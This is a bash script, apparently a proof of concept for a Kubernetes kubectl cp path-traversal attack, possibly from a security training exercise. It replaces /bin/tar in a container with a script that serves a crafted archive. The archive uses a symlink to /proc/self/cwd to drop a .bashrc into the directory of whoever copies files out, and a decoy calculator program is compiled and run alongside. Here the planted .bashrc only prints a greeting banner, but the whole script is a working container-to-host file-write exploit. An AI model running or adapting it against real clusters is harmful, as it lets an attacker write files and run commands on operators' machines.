#!/bin/bash

cat<<EOF > tarbad
#!/bin/bash

cat /evil/pwn.tar
EOF
mkdir badbash
cd badbash
ln -s /proc/self/cwd k8s-master
cd k8s-master
cat<<EOF > .bashrc
echo " _____________________"
echo "< Hello K-Shield Jr. 2>"
echo " --------------------- "
echo "   \"
echo "    \"
echo "     \ "
echo "                    ##        ."
echo "              ## ## ##       =="
echo "           ## ## ## ##      ==="
echo "       /""""""""""""""""___/ ==="        
echo "  ~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ /  ===- ~~~"   
echo "       \______ o          __/"            
echo "        \    \        __/ "            
echo "          \____\______/   "
EOF
cd /evil
tar -cf pwn.tar badbash/
cp tarbad /bin/tar

cat<<EOF > a.c
#include <stdio.h>

main()
{
	int a, b;
	char c;
	printf(" ex) 1 + 1");
	scanf("%d %d %c", &a, &b, &c);
	switch(c)
	{
		case '+':
		printf("%d + %d = %d \n", a, b, a + b);
		break;
		case '-':
		printf("%d - %d = %d \n", a, b, a - b);
		break;
		case '*':
		printf("%d * %d = %d \n", a, b, a * b);
		break;
		case '/':
		if(b != 0)
		printf("%d / %d = %d \n", a, b, a / b);
		else
			printf("error\n");
		break;
		default:
		printf("error\n");
	}
}
EOF
gcc -o a a.c
chmod 777 a
rm -rf a.c
./a
